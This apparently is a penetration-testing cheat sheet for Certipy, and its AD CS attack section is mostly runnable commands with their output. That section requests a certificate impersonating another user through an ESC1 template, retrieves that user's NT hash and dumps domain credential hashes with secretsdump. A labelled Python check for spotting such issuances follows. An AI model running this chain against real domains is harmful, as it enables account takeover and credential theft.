Active Directory Certificate Services enumeration and abuse.
git clone https://github.com/ly4k/Certipy
sudo python3 setup.py install
certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...
Certipy v4.8.2 - by Oliver Lyak (ly4k)
positional arguments:
{account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template}
Action
account Manage user and machine accounts
auth Authenticate using certificates
ca Manage CA and certificates
cert Manage certificates and private keys
find Enumerate AD CS
forge Create Golden Certificates
ptt Inject TGT for SSPI authentication
relay NTLM Relay to AD CS HTTP Endpoints
req Request certificates
shadow Abuse Shadow Credentials for account takeover
template Manage certificate templates
options:
-v, --version Show Certipy's version number and exit
-h, --help Show this help message and exit
For more examples please check the Github Repo.
$ certipy find -u [email protected] -p Welkom1234 -dc-ip 10.10.10.10
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 9 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 8 enabled certificate templates
[*] Trying to get CA configuration for 'CA01-OFFSEC' via CSRA
[*] Got CA configuration for 'CA01-OFFSEC'
[*] Saved BloodHound data to '202210114803_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '202210114803_Certipy.txt'
[*] Saved JSON output to '202210114803_Certipy.json'
$ certipy req -u 'crypt0rr.offsec.nl' -p 'Welkom1234' -target 'dc01.offsec.nl' -ca 'CA01-OFFSEC' -template 'ESC1' -upn '[email protected]'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 707
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'john-da.pfx'
$ certipy auth -pfx 'john-da.pfx' -dc-ip '10.10.10.11' -username 'john-da' -domain 'offsec.nl'
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT.
[*] Got TGT
[*] Saved credential cache to 'john-da.ccache'
[*] Trying to retrieve NT hash for 'john-da'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305
$ secretsdump.py -just-dc -hashes 'aad3b435b51404eeaad3b435b51404ee:caec1e1d755119a15bfb6cd3d5994305' 'offsec.nl/[email protected]'
Impacket v0.10.1.dev1+20220504.120002.d5097759 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5f859684db2422704e9e4c2cd7e27b07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]
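Added defender-side check (example code written here, not part of Certipy, Impacket or this page): the session above leaves a trace in the CA's issued-certificate records, a request submitted by one account whose SAN UPN names a different account, with no object SID bound into the certificate. The record shape below is an assumed, simplified view of those CA records, and the sample entries are constructed to mirror request 707 on CA01-OFFSEC.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class IssuedCert:
    # Assumed, simplified shape of one issued-certificate record from the CA
    request_id: int
    requester: str            # account that submitted the CSR, e.g. "OFFSEC\\crypt0rr"
    template: str             # template the certificate was issued from
    san_upn: Optional[str]    # UPN carried in the Subject Alternative Name, if any
    has_object_sid: bool      # whether the cert carries the object SID extension

def account_name(principal: str) -> str:
    """Reduce "DOMAIN\\user", "user@domain" or "user" to a lowercase "user"."""
    name = principal.rsplit("\\", 1)[-1]   # drop a DOMAIN\ prefix
    name = name.split("@", 1)[0]           # drop an @domain suffix
    return name.lower()

def review_issued_cert(cert: IssuedCert) -> List[str]:
    """Return the reasons this issuance matches the ESC1 pattern (empty if benign)."""
    reasons: List[str] = []
    if cert.san_upn and account_name(cert.san_upn) != account_name(cert.requester):
        reasons.append("san-upn-mismatch")   # requester obtained a cert for someone else
    if cert.san_upn and not cert.has_object_sid:
        reasons.append("no-object-sid")      # nothing ties the UPN to a specific AD object
    return reasons

def find_suspicious(certs: List[IssuedCert]) -> List[Tuple[int, List[str]]]:
    """Request IDs worth a closer look, each with the reasons it was flagged."""
    return [(c.request_id, review_issued_cert(c))
            for c in certs if review_issued_cert(c)]

# Constructed sample records: two ordinary enrollments and the request from the session.
SAMPLE = [
    IssuedCert(705, "OFFSEC\\john-da", "User", "john-da@offsec.nl", True),
    IssuedCert(706, "OFFSEC\\crypt0rr", "User", "crypt0rr@offsec.nl", True),
    IssuedCert(707, "OFFSEC\\crypt0rr", "ESC1", "john-da@offsec.nl", False),
]

if __name__ == "__main__":
    for request_id, why in find_suspicious(SAMPLE):
        print(f"request {request_id}: {', '.join(why)}")   # → request 707: san-upn-mismatch, no-object-sid
```

Feeding real CA records into `find_suspicious` only needs a mapping from their fields onto `IssuedCert`; the mismatch and missing-SID checks are the same.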